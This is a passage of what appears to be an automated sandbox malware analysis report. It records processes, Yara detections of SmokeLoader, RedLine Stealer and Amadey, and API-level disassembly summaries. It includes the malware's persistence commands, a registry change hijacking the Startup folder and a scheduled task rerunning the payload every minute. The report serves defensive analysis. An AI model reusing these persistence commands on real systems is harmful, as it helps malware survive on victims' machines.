Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 1020 Parent PID: 568

General

Start time:	02:07:37
Start date:	23/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k unistacksvcgroup
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 2644 Parent PID: 568

General

Start time:	02:07:38
Start date:	23/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 2596 Parent PID: 568

General

Start time:	02:07:38
Start date:	23/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: SgrmBroker.exe PID: 5316 Parent PID: 568

General

Start time:	02:07:39
Start date:	23/08/2021
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff634960000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 1784 Parent PID: 568

General

Start time:	02:07:39
Start date:	23/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6560 Parent PID: 568

General

Start time:	02:07:48
Start date:	23/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: uwtjrji PID: 6600 Parent PID: 528

General

Start time:	02:07:50
Start date:	23/08/2021
Path:	C:\Users\user\AppData\Roaming\uwtjrji
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\uwtjrji
Imagebase:	0x400000
File size:	241664 bytes
MD5 hash:	5C65AF376BFF0067A2109686755B36DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000012.00000002.332203358.00000000024E0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000012.00000002.336085099.00000000041A1000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 41%, ReversingLabs

Chronological Activities

Analysis Process: svchost.exe PID: 6748 Parent PID: 568

General

Start time:	02:07:57
Start date:	23/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: 4851.exe PID: 6972 Parent PID: 3388

General

Start time:	02:08:02
Start date:	23/08/2021
Path:	C:\Users\user\AppData\Local\Temp\4851.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4851.exe
Imagebase:	0x400000
File size:	316928 bytes
MD5 hash:	B2D6C4C03D94DD7B4143BD7F553ACAF3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Chronological Activities

Analysis Process: conhost.exe PID: 6984 Parent PID: 6972

General

Start time:	02:08:02
Start date:	23/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: DB3B.exe PID: 5536 Parent PID: 3388

General

Start time:	02:08:40
Start date:	23/08/2021
Path:	C:\Users\user\AppData\Local\Temp\DB3B.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\DB3B.exe
Imagebase:	0x13e0000
File size:	3303352 bytes
MD5 hash:	505468E6735F6B0BF0D37A937EB2D155
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001A.00000002.508968436.00000000013E2000.00000040.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: conhost.exe PID: 2440 Parent PID: 5536

General

Start time:	02:08:41
Start date:	23/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: MpCmdRun.exe PID: 6928 Parent PID: 1784

General

Start time:	02:08:43
Start date:	23/08/2021
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Imagebase:	0x7ff61bcd0000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6940 Parent PID: 6928

General

Start time:	02:08:43
Start date:	23/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: F3D5.exe PID: 5064 Parent PID: 3388

General

Start time:	02:08:45
Start date:	23/08/2021
Path:	C:\Users\user\AppData\Local\Temp\F3D5.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\F3D5.exe
Imagebase:	0x400000
File size:	290304 bytes
MD5 hash:	15EC7577EE3AE8FAAF21E42F168B3513
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rnyuf.exe PID: 6176 Parent PID: 5064

General

Start time:	02:08:50
Start date:	23/08/2021
Path:	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe'
Imagebase:	0x400000
File size:	290304 bytes
MD5 hash:	15EC7577EE3AE8FAAF21E42F168B3513
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000021.00000002.565682017.0000000006723000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000021.00000002.513466845.00000000024C6000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000021.00000002.571555571.0000000006748000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Chronological Activities

Analysis Process: cmd.exe PID: 6308 Parent PID: 6176

General

Start time:	02:08:53
Start date:	23/08/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\bd1299733e\
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 992 Parent PID: 6308

General

Start time:	02:08:54
Start date:	23/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: schtasks.exe PID: 6332 Parent PID: 6176

General

Start time:	02:08:54
Start date:	23/08/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR 'C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe' /F
Imagebase:	0xdb0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6360 Parent PID: 6332

General

Start time:	02:08:55
Start date:	23/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: reg.exe PID: 6232 Parent PID: 6308

General

Start time:	02:08:55
Start date:	23/08/2021
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\bd1299733e\
Imagebase:	0x1050000
File size:	59392 bytes
MD5 hash:	CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rnyuf.exe PID: 5224 Parent PID: 528

General

Start time:	02:08:58
Start date:	23/08/2021
Path:	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe
Imagebase:	0x400000
File size:	290304 bytes
MD5 hash:	15EC7577EE3AE8FAAF21E42F168B3513
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Microsoft.exe PID: 6196 Parent PID: 6176

General

Start time:	02:09:09
Start date:	23/08/2021
Path:	C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe'
Imagebase:	0x950000
File size:	2599240 bytes
MD5 hash:	0DEFE1E926B2407EE4A292480D8EBF48
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Chronological Activities

Analysis Process: conhost.exe PID: 6532 Parent PID: 6196

General

Start time:	02:09:10
Start date:	23/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: xuTyOmef1g.exe PID: 1404 Parent PID: 5360 xuTyOmef1g.exeCOMMON

Executed Functions

Function 0041E630, Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 298memorythreadlibraryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(004395A0), ref: 0041E64E
GetFileSizeEx.KERNEL32(00000000,00000000), ref: 0041E6DB
GetCommState.KERNEL32(00000000,?), ref: 0041E7BC
GetQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041E7DB
IsProcessorFeaturePresent.KERNEL32(00000000), ref: 0041E7E3
GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041E7F1
GetLastError.KERNEL32 ref: 0041E823
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 0041E837
InterlockedDecrement.KERNEL32(?), ref: 0041E87E
LoadLibraryA.KERNEL32(00426134), ref: 0041E8DC
GlobalFix.KERNEL32(00000000), ref: 0041E8E4
LocalAlloc.KERNELBASE(00000000,0239DEC4), ref: 0041E8F5
SetThreadLocale.KERNEL32(00000000), ref: 0041E935
HeapWalk.KERNEL32(00000000,00000000), ref: 0041E93F
WriteProfileStringW.KERNEL32(00426270,004261E8,00426158), ref: 0041E954
EnumResourceNamesA.KERNEL32(00000000,00426370,00000000,00000000), ref: 0041E99A
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041E9A2
OpenSemaphoreA.KERNEL32(00000000,00000000,004263B4), ref: 0041E9D5
GetSystemTime.KERNEL32(00000000), ref: 0041E9DD
WriteProfileSectionW.KERNEL32(00426408,004263D4), ref: 0041EA28
ReleaseActCtx.KERNEL32(00000000), ref: 0041EA3F
FatalAppExitA.KERNEL32(00000000,0042613C), ref: 0041EA4C
UnregisterWait.KERNEL32(00000000), ref: 0041EA69
UnregisterWaitEx.KERNEL32(00000000,00000000), ref: 0041EA73
FindActCtxSectionStringW.KERNEL32(00000000,00000000,00000000,00426490,?), ref: 0041EA8B
InterlockedDecrement.KERNEL32(?), ref: 0041EA98
FindAtomW.KERNEL32(004264C0), ref: 0041EADB
SetThreadContext.KERNEL32(00000000,00000000), ref: 0041EAE5
OpenMutexW.KERNEL32(00000000,00000000,00426514), ref: 0041EAF4
GetConsoleMode.KERNEL32(00000000,00000000), ref: 0041EB45
SetConsoleTitleW.KERNEL32(00426538), ref: 0041EB50
CopyFileExW.KERNEL32(0042659C,00426558,00000000,00000000,00000000,00000000), ref: 0041EB68

Strings

onI, xrefs: 0041E8A1
sapupe, xrefs: 0041E667
&Pc, xrefs: 0041EB08
";, xrefs: 0041E9A8
Pc, xrefs: 0041EAAF

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: Console$DecrementFileFindInterlockedOpenProfileSectionStringThreadUnregisterWaitWrite$AliasesAllocAtomCommCompletionContextCopyEnumEnvironmentErrorExitFatalFeatureFreeGlobalHeapLastLengthLibraryLoadLocalLocaleModeMutexNamesOverlappedPresentProcessorQueuedReleaseResourceResultSemaphoreSizeStateStatusStringsSystemTimeTitleWalklstrlen
String ID: ";$&Pc$Pc$onI$sapupe
API String ID: 3555784277-1163723601
Opcode ID: 7913fe0c06971ee693541ec9c6da0725219078824327ee7f961c0673dae388b0
Instruction ID: 894d5077bc5e13f4873662bc39ca7e2204b0e2aff3a4029963a92a6cebbd2bd6
Opcode Fuzzy Hash: 7913fe0c06971ee693541ec9c6da0725219078824327ee7f961c0673dae388b0
Instruction Fuzzy Hash: 47C1C874E84214DBE760AB61DC0ABD877B0BB14B05F10C0EAE54D662C1CBB969C9CF5E

Uniqueness

Uniqueness Score: -1.00%

Function 0041D340, Relevance: 37.1, APIs: 3, Strings: 18, Instructions: 324librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00425F18), ref: 0041D378
GetProcAddress.KERNEL32(0239DEC0,004395A0), ref: 0041DD2B
VirtualProtect.KERNELBASE(02396008,0239DEC4,00000040,?), ref: 0041DD4F

Strings

=Mbt, xrefs: 0041DC61
25r3, xrefs: 0041D885
@, xrefs: 0041DC98
QB4, xrefs: 0041D3FF
8j/, xrefs: 0041D3C3
QGk , xrefs: 0041D88F
Yh, xrefs: 0041D445
snkr, xrefs: 0041DC0D
T^Yu, xrefs: 0041D657
%&C, xrefs: 0041D767
U!8, xrefs: 0041D3F5
M{h, xrefs: 0041D78F
2h, xrefs: 0041DAAB
-tIO, xrefs: 0041D9EF
v;M, xrefs: 0041DB51
G6~0, xrefs: 0041D5A6
]k;z, xrefs: 0041D980
L|j, xrefs: 0041DB9E

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: AddressLibraryLoadProcProtectVirtual
String ID: 8j/$ %&C$-tIO$25r3$2h$=Mbt$@$G6~0$M{h$QB4$QGk $T^Yu$U!8$Yh$]k;z$snkr$L|j$v;M
API String ID: 3509694964-3870779105
Opcode ID: 6a656c566e4158b38683bb604575756049404af3c967f302f306fd950cf85796
Instruction ID: ad2b14a81b9b61d11a5cdc4c03d3145e3531acbd3316b8dcd82290f56a266895
Opcode Fuzzy Hash: 6a656c566e4158b38683bb604575756049404af3c967f302f306fd950cf85796
Instruction Fuzzy Hash: B932EAB5D063A8CFDB65CFA6A9897CDBB70BB15304F6082C8D5492B211CB714AC5CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 00401995, Relevance: 3.1, APIs: 2, Instructions: 52sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019D2
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019FA

Memory Dump Source

Source File: 00000000.00000002.271455171.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: bcdb4ce197b4624848e0434c3cecf8bb73fddbd079a89888b3aed0f19e214681
Instruction ID: 2ba8d485649ef9dc555f469e2d9c6b56d1050b598c7c2bb426bbb3a3204dd29a
Opcode Fuzzy Hash: bcdb4ce197b4624848e0434c3cecf8bb73fddbd079a89888b3aed0f19e214681
Instruction Fuzzy Hash: 9901F7B1308104FBDB016A948D51EBA3229AB04350F200537B643B80F1C57D9512AB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004019A1, Relevance: 3.0, APIs: 2, Instructions: 46sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019D2
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019FA

Memory Dump Source

Source File: 00000000.00000002.271455171.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 91979d86caefdc2bec098f9fdaaa317bd5775bb9d9cee66cb7b385bce327cb2a
Instruction ID: 9ecdec514cf71f5eeb304a1e2f202b265b0d51b5f31dfdf67d95f392e824f2cf
Opcode Fuzzy Hash: 91979d86caefdc2bec098f9fdaaa317bd5775bb9d9cee66cb7b385bce327cb2a
Instruction Fuzzy Hash: 45F0D1B2304145FADB019F848D91EAE3225AB04351F200977F753B80F1C53D8512AB2B

Uniqueness

Uniqueness Score: -1.00%

Function 004019AD, Relevance: 3.0, APIs: 2, Instructions: 42sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019D2
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019FA

Memory Dump Source

Source File: 00000000.00000002.271455171.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: f011721a65e637b70558abfa7ff97a629b9e28d59a94cb7349b8908f47978591
Instruction ID: c9128524272919db4071d016e368c832c930b36d74f35c43d3039e04d983ac6b
Opcode Fuzzy Hash: f011721a65e637b70558abfa7ff97a629b9e28d59a94cb7349b8908f47978591
Instruction Fuzzy Hash: ADF0C272304244FBDB01AF948DA1EAE3265AB44355F204977B753B80F1CA7DC512AB2B

Uniqueness

Uniqueness Score: -1.00%

Function 004019C0, Relevance: 3.0, APIs: 2, Instructions: 41sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019D2
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019FA

Memory Dump Source

Source File: 00000000.00000002.271455171.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 830d97e4aa38939fe6a0ba024ee8ca959389ae08b10c71b31fdc54db1b38a647
Instruction ID: 77f4f58ad70177de11a0d2c10a1031ab6784e6ffca1e9eb20b8bff71da297da0
Opcode Fuzzy Hash: 830d97e4aa38939fe6a0ba024ee8ca959389ae08b10c71b31fdc54db1b38a647
Instruction Fuzzy Hash: FCF0C272304205FBDB01AE94CD91EAE3325AB44315F204977B603B80F1CA3D8512AB2B

Uniqueness

Uniqueness Score: -1.00%

Function 0243003C, Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0243024D

Strings

cess, xrefs: 0243018D
kernel32.dll, xrefs: 0243008F, 02430095

Memory Dump Source

Source File: 00000000.00000002.271884102.0000000002430000.00000040.00000001.sdmp, Offset: 02430000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction ID: 609f000aed28f3d1db770df1fdf927682eecf287ee00c9687496c2a648cc8ee4
Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction Fuzzy Hash: EF527975A01229DFDB65CF58C984BADBBB1BF09304F1481DAE90DAB351DB30AA85CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1C0, Relevance: 10.8, APIs: 7, Instructions: 326COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 0040D200
GetFileType.KERNEL32(?), ref: 0040D487

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: FileInfoStartupType
String ID:
API String ID: 3016745765-0
Opcode ID: 413cfad40856d5793cc67c7cd752d90fe8a580e44ecc4bbb71abfb8ba665c806
Instruction ID: 45d184aa1cf0ff50618850f313264eaebdb35a8146bc4d478e456a0ec73ef952
Opcode Fuzzy Hash: 413cfad40856d5793cc67c7cd752d90fe8a580e44ecc4bbb71abfb8ba665c806
Instruction Fuzzy Hash: 3CE11B74E04248DFDB24CFA8C894B9DFBB1BB49314F24866ED8656B382C735A846CF45

Uniqueness

Uniqueness Score: -1.00%

Function 02430DF8, Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02430223,?,?), ref: 02430E02
SetErrorMode.KERNELBASE(00000000,?,?,02430223,?,?), ref: 02430E07

Memory Dump Source

Source File: 00000000.00000002.271884102.0000000002430000.00000040.00000001.sdmp, Offset: 02430000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: d5b8661dbf2509d7ade2169bd205e228aae57b4c04d7c3d0ba0fe1cc3e44af13
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: EDD0123224512C77D7012A94DC09BCE7B5C9F05B66F008011FB0DD9581C770994046E5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0041E430, Relevance: 18.1, APIs: 12, Instructions: 90memorypipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0041E458
GetConsoleCursorInfo.KERNEL32(00000000,00000000), ref: 0041E46E
GetPrivateProfileIntW.KERNEL32(0042601C,00425F28,00000000,00000000), ref: 0041E482
VirtualFree.KERNEL32(00000000,00000000,00000000), ref: 0041E49A
GetSystemWindowsDirectoryA.KERNEL32(?,00000400), ref: 0041E4AC
GetCPInfoExA.KERNEL32(00000000,00000000,?), ref: 0041E4BD
GetCommandLineA.KERNEL32 ref: 0041E4C3
GetStartupInfoW.KERNEL32(00000000), ref: 0041E4CB
InterlockedDecrement.KERNEL32(?), ref: 0041E52F
CreateNamedPipeW.KERNEL32(00426058,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E548
SetCurrentDirectoryA.KERNEL32(0042609C), ref: 0041E553
HeapWalk.KERNEL32(00000000,00000000), ref: 0041E5A3

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: Info$Directory$CommandConsoleCountCreateCurrentCursorDecrementFreeHeapInterlockedLineNamedPipePrivateProfileStartupSystemTickVirtualWalkWindows
String ID:
API String ID: 2147620772-0
Opcode ID: cecc40e3c7b38ccbb9f5ff2caa16f3f4e71e93e1916b3ddd97130b83a6e4a3aa
Instruction ID: d97dbd9e76f23836a673f845a15841c44cfc199f16a5a4d835db94ee5555d062
Opcode Fuzzy Hash: cecc40e3c7b38ccbb9f5ff2caa16f3f4e71e93e1916b3ddd97130b83a6e4a3aa
Instruction Fuzzy Hash: A0313E74D84214EFDB20DBA1ED09BD93B75BB1870AF1080AAF909661C1C7B819C5DF0D

Uniqueness

Uniqueness Score: -1.00%

Function 0041DD80, Relevance: 16.6, APIs: 11, Instructions: 52librarypipetimeCOMMON

Download Yara Rule

APIs

GetDriveTypeA.KERNEL32(00425EAC), ref: 0041DD9B
LoadLibraryA.KERNEL32(00425EB4), ref: 0041DDA6
SetNamedPipeHandleState.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041DDB4
CompareFileTime.KERNEL32(?,?), ref: 0041DDC5
GetVersionExA.KERNEL32(?), ref: 0041DDD2
GetCurrentThreadId.KERNEL32 ref: 0041DDD8
CreateDirectoryA.KERNEL32(00425ED4,00000000), ref: 0041DDE5
LoadLibraryA.KERNEL32(00000000), ref: 0041DDED
IsSystemResumeAutomatic.KERNEL32 ref: 0041DDF3
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041DDFB
CompareStringW.KERNEL32(00000000,00000000,00425F00,00000000,00425EF4,00000000), ref: 0041DE13

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: CompareLibraryLoad$AutomaticCreateCurrentDirectoryDriveEnvironmentFileFreeHandleNamedPipeResumeStateStringStringsSystemThreadTimeTypeVersion
String ID:
API String ID: 1734459017-0
Opcode ID: 47952564a674249da837fae05404b2cfca3d707973fb104f4960e42da1825a15
Instruction ID: 404ba83a64db7c25861e552beb4f5902b58ed14302f8c2ba7e4cb25f3e76dfc2
Opcode Fuzzy Hash: 47952564a674249da837fae05404b2cfca3d707973fb104f4960e42da1825a15
Instruction Fuzzy Hash: 06113D75A81704EFD710DBA4EC4ABD83B74BB09B01F2080B5F2099A1D2D7B46A59CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004105A0, Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00418A3D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00418A54
UnhandledExceptionFilter.KERNEL32(004250D8), ref: 00418A5F
GetCurrentProcess.KERNEL32(C0000409), ref: 00418A7D
TerminateProcess.KERNEL32(00000000), ref: 00418A84

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 81ce489040b7c4ba0222b359d94b47ac924f6cfd74f6715105254163967c367f
Instruction ID: b5a31193f26d8ccf6667da52b2cf7a18394332f09fd5dd4b5e4c2c5c3fef38fd
